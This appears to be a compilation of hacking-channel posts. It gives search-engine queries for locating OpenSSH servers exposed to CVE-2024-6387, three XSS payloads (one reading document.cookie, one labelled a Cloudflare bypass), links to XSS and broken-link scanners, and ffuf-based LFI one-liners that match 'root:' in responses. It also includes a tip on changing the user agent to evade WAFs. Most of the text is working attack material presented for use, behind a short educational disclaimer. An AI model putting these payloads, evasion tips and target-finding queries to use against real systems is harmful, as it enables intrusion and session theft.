🚨Alert🚨CVE-2024-6387: Remote Unauthenticated Code Execution Vulnerability in OpenSSH server
⚠The vulnerability, which is a signal handler race condition in OpenSSH’s server (sshd), allows unauthenticated RCE as root on glibc-based Linux systems; that presents a significant security risk.
👇Query
Hunter: /product.name="OpenSSH"
FOFA: app="OpenSSH"
SHODAN: product:"OpenSSH"
haxshadow
https://youtu.be/EUBhZOFAcxA
XSS Payload
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
"><img src=x onerror=confirm(document.cookie)>
<sVg/onLy=1 onLoaD=confirm(1)//
Try this amazing XSS scanner made by our brother Sarper. It's so fast because of a new method: it can scan 1k URLs in just 5-20 sec with a 99% success rate. It scans URLs with XSS polyglot payloads and runs on all URL parameters. Just put all URLs in a wordlist file; once you get a hit, just open that link directly and the XSS popup shows ❤️
https://github.com/sarperavci/MXS
Try this tool to find broken link hijacking, thanks to Nafeed for sharing it with me: https://github.com/H4cker-Nafeed/Nafeed-Broken-Link
Nafeed-Broken-Link: A Python tool designed to check for broken social media links on a given domain. This script crawls all accessible pages of a specified domain and identifies social media links,...
Try these XSS polyglots to bypass WAF; it will surely help you. Just use it manually + one-liner commands: https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
Try this amazing auto scanner made by our brother..
https://github.com/wapiti-scanner/wapiti
Try this amazing LFI one-liner; it's very fast and effective. Also change the ffuf user agent so it doesn't get blocked by WAFs.
waymore -i "testphp.vulnweb.com" -n -mode U | gf lfi | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read -r urls; do ffuf -u "$urls" -w payloads/lfi.txt -c -mr "root:" -v; done
waymore -i "testphp.vulnweb.com" -n -mode U | gf lfi | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | tee testphp.vulnweb.com.lfi.txt
cat testphp.vulnweb.com.lfi.txt | while read -r urls; do ffuf -u "$urls" -w payloads/lfi.txt -c -mr "root:" -v; done
remote code execution | CVE-2024-7954 | bug-bounty poc
https://youtu.be/P9QxmY1gS3g?si=ECP1ACaUu8bUbCbA
// Disclaimer //
Hacking without permission is illegal. This channel is strictly educational for learning about cyber-security in the areas of ethical hacking and penetration testing…